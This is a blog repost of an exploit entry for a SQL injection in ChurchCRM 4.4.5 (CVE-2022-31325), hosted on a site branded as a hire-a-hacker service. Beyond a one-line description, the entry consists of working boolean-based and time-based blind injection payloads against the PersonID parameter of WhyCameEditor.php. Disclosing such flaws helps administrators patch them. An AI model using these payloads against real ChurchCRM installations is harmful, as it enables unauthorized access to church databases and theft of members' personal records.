Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86373928

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

ChurchCRM 4.4.5 - SQLi 

# Exploit Title: ChurchCRM 4.4.5 - SQLi
# Exploit Author: nu11secur1ty
# Date: 05.11.2022
# Vendor: https://churchcrm.io/
# Software: https://github.com/ChurchCRM/CRM
# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325

## Description:
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.

[+] Payloads:

```mysql
---
Parameter: PersonID (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: PersonID=1 AND (SELECT 7116 FROM
(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
---

```